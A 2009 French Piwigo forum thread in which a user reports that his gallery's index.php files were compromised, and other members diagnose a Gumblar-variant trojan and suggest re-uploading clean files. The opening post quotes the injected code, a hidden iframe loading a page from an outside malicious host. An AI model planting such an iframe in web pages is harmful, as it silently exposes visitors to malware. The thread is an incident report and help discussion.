Piwigo.org

musidora · 2009-06-21 12:07:39

.htaccess FileZilla malware piratage Sécurité trojan virus

Bonjour,

J'utilise Piwigo depuis 3 ans sans problème et depuis quelques jours, je me suis aperçu que l'on m'avais piraté mon site.
En effet, tous le fichiers index.php sont modifiés et contiennent se genre de truc :
<iframe src="http://catchynamestore.cn:8080/index.php" width=166 height=153 style="visibility: hidden"></iframe>

Depuis j'essaie de sécurisé mon site avec le fichier ".htaccess" mais apparemment chez free c'est très limité !

Avez vous une solution ?

Merci pour votre aide !

nicolas · 2009-06-21 13:14:26

Il va falloir nous en dire plus. T'aider avec les infos que nous donne tient plus de la divination !
Qu'as-tu modifié par rapport à la version que tu utilises ? D'ailleurs laquelle tu utilises ? Peux-tu nous donner l'url de ta galerie ? En privé si tu préfères.

musidora · 2009-06-21 13:39:02

nicolas a écrit:
Il va falloir nous en dire plus. T'aider avec les infos que nous donne tient plus de la divination !
Qu'as-tu modifié par rapport à la version que tu utilises ? D'ailleurs laquelle tu utilises ? Peux-tu nous donner l'url de ta galerie ? En privé si tu préfères.

J'utilise la dernière version la 2.0.2 et j'ai rien modifié.

Je viens de t'envoyer l'adresse de mon site par mail

Merci d'avance de ton aide

Dernière modification par musidora (2009-06-21 13:39:23)

VDigital · 2009-06-21 15:52:44

Ce cas de figure est notre priorité N° 1.
Nicolas, si tu as besoin d'aide...

nicolas · 2009-06-21 20:22:38

Le peu d'infos que tu donnes et l'url de ton site (où il n'y a qu'un message d'erreur) ne nous aide pas.

musidora · 2009-06-21 21:23:00

nicolas a écrit:
Le peu d'infos que tu donnes et l'url de ton site (où il n'y a qu'un message d'erreur) ne nous aide pas.

Dis moi ce que tu veux et je te le donne ( les fichiers index.php modifiés ? )

VDigital · 2009-06-21 21:25:49

Avant de dire que ton site a été piraté, je vais t'envoyer un MP car je ne comprends pas.

VDigital · 2009-06-21 23:00:56

Le fichier index.php contenait 2 virus de type HTML/Frame.
Je n'avais jamais vu ça.

Cela reste à surveiller surtout sur les sites chez free.
Un simple transfert d'une version saine du fichier .php résout le pb.

musidora? [Résolu] ?

;-)

Gotcha · 2009-06-22 00:03:03

Et comment s'en prémunir ???

VDigital · 2009-06-22 00:09:58

Cela n'arrive jamais.
C'est bien la première fois que je vois ça.

;-)

Gotcha · 2009-06-22 00:36:07

Il faut bien une première fois ^^
Bon bah si le problème vient de l'ordinateur du webmaster, c'est "rassurant".

jpsol · 2009-06-22 00:45:59

Un script en perl est susceptible de faire ce genre de travail mais les hébergeurs refusent ce langage je crois bien.
A savoir le genre de pluggin ou adon qui ont été chargé sur le site également ?
L'explication la plus plausible est une modif du fichier sur la machine du webmaster et l'upload d'un fichier vérolé.

VDigital · 2009-06-22 07:55:34

jpsol a écrit:
Un script en perl est susceptible de faire ce genre de travail mais les hébergeurs refusent ce langage je crois bien.

Cela peut également venir de l'hébergeur.
Mais chez free, aucune ne ces hypothèses ne devraient tenir très longtemps...

musidora · 2009-06-22 09:48:22

Perso, je ne pense pas que cela vienne d'un virus de mon PC car quand je regarde les scripts php dans le package qui m'a servi à l'installation, je ne vois aucun virus.

Perso, je pense plutôt à une attaque du genre :
http://forum.ovh.com/showthread.php?t=19263

ou un hackage du password de mon ftp (que je viens de changer)

J'ai essayé de sécurisé avec le fichier ".htaccess" mais chez free c'est très limité.

Encore merci pour votre aide

Dernière modification par musidora (2009-06-22 09:48:43)

nicolas · 2009-06-22 10:14:28

jpsol a écrit:
Un script en perl est susceptible de faire ce genre de travail mais les hébergeurs refusent ce langage je crois bien.

Pourquoi ce serait plus facile en perl qu'avec php ? Aucun rapport.

L'hypothèse la plus plausible reste un virus sur son poste de travail qui a modifié le fichier index.php. Une autre hypothèse serait que son hébergement contient une autre application contenant une faille de sécurité qui a permis cet "exploit".

Edit: en fait c'est un cheval de troie, variante de Gumblar. Bon courage pour t'en débarrasser.

Dernière modification par nicolas (2009-06-22 10:28:35)

Piwigo.org

Annonce

#1 2009-06-21 12:07:39

[Résolu] Piratage de mon site web / cherche solution pour sécuriser

#2 2009-06-21 13:14:26

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#3 2009-06-21 13:39:02

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

nicolas a écrit:

#4 2009-06-21 15:52:44

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#5 2009-06-21 20:22:38

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#6 2009-06-21 21:23:00

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

nicolas a écrit:

#7 2009-06-21 21:25:49

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#8 2009-06-21 23:00:56

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#9 2009-06-22 00:03:03

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#10 2009-06-22 00:09:58

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#11 2009-06-22 00:36:07

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#12 2009-06-22 00:45:59

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#13 2009-06-22 07:55:34

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

jpsol a écrit:

#14 2009-06-22 09:48:22

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

#15 2009-06-22 10:14:28

Re: [Résolu] Piratage de mon site web / cherche solution pour sécuriser

jpsol a écrit:

Pied de page des forums